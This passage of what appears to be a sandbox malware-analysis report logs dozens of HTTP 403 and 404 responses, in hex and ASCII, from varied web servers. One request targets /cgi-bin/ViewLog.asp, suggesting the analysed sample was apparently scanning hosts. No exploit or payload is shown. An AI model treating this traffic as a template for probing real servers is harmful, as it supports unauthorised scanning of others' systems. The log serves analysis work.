76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plainDate: Thu, 23 Nov 2023 04:16:15 GMTAccess-Control-Expose-Headers: LocationAccess-Control-Allow-Methods: POST, GET, PUT, DELETE, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Cache-ControlConnection: keep-aliveContent-Length: 22
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 07:20:27 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 06:15:20 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Thu, 23 Nov 2023 04:16:41 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:16:48 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:16:54 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 05:09:04 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 23 Nov 2023 04:17:29 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 23 Nov 2023 04:17:30 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 193Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3b 0f 82 40 10 84 fb fb 15 2b 8d 15 ac af f2 72 85 3c 22 09 2a 05 9a 50 02 b7 91 4b 80 23 dc 89 f1 df cb a3 b1 9c d9 6f 76 86 6f 82 bb 9f e5 69 08 97 ec 9a 40 fa 38 27 b1 0f 8e 8b 18 87 59 84 18 64 c1 7a 39 78 3b c4 f0 e6 08 c6 6b db 36 82 d7 54 c8 49 58 65 1b 12 a7 dd 11 22 3d 94 4a 4a ea 38 ae 26 e3 b8 40 bc d4 f2 3b e7 f6 e2 8f 99 14 e3 bd c8 f5 1b a4 ee b6 16 ea 62 24 e8 69 68 95 31 4a 77 60 35 14 55 45 c6 00 56 2f e5 96 aa c3 a7 a2 4f a2 5f 5e 61 7a 36 13 b5 32 60 68 18 69 f0 38 f6 73 e1 52 35 3d 9f 27 b2 1f bd cc 11 ff dd 00 00 00 Data Ascii: M;@+r<"*PK#ovoi@8'Ydz9x;k6TIXe"=JJ8&@;b$ih1Jw`5UEV/O_^az62`hi8sR5='
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Thu, 23 Nov 2023 04:17:40 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Thu, 23 Nov 2023 04:17:46 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:17:46 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=-zM83gBZhbpp-kAeS5hnTDWl; Path=/Content-Type: text/html;charset=utf-8Content-Length: 1199Date: Thu, 23 Nov 2023 04:16:19 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 37 2e 30 2e 31 37 2e 46 69 6e 61 6c 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 33 20 2d 20 54 68 65 20 72 65 71 75 65 73 74 20 62 6f 64 79 20 77 61 73 20 74 6f 6f 20 6c 61 72 67 65 20 74 6f 20 62 65 20 63 61 63 68 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 70 72 6f 63 65 73 73 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 20 62 6f 64 79 20 77 61 73 20 74 6f 6f 20 6c 61 72 67 65 20 74 6f 20 62 65 20 63 61 63 68 65 64 20 64 75 72 69 6e 67 20 74 68 65 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 23 Nov 2023 04:17:36 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 05:17:50 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveDate: Thu, 23 Nov 2023 04:17:51 GMTContent-Length: 10Server: Streamer 21.08Data Raw: 4e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: Not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:17:53 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/8.0.26Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.vbmh.nl/wp-json/>; rel="https://api.w.org/"Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 61 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 2d 4e 4c 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 31 32 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2d 31 2e 70 6e 67 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 69 6e 61 20 6e 69 65 74 20 67 65 76 6f 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 56 42 4d 48 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6b 69 74 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 